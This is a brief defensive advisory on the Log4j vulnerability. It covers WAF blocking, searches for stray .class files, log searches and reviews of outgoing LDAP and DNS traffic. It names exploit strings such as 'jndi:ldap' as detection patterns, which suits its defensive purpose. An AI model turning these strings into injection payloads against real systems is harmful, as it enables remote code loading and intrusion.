Immediate Actions to Protect Against Exploitation of the Log4j Vulnerability
CSA has just released an update on the recommendations to protect against the Log4j Vulnerability. Please click on the link to read the full advisory.
Part of the recommendations is to Deploy Protective Network Monitoring and Review System Logs
Users that have Web Application Firewalls (WAFs) should ensure applicable rules are applied to protect against the vulnerability. These could include blocking URLs containing exploit strings like “jndi:ldap”. However, WAFs should not be relied on as the only control and users should also adopt other measures to defend their network as certain variants of the string may bypass WAF rules.
The attack may involve JNDI remote class loading, which refers to the downloading of a remote malicious .class file onto the server. Users that deploy or maintain their Java applications can look out for alien Java .class found within the CLASSPATH. They can also search their Log4j log files for JNDI exploit strings like "jndi:". The presence of such indicators may be indicative of an attack.
Users can also search for outgoing LDAP connections to Internet destinations not seen before 1 December 2021. If detected, users should search the initiating host for the presence of Log4j. If DNS queries are logged, queries by the host should be reviewed to check for any possible exfiltration over DNS protocol.
Please contact any of our Client Managers if you need urgent assistance.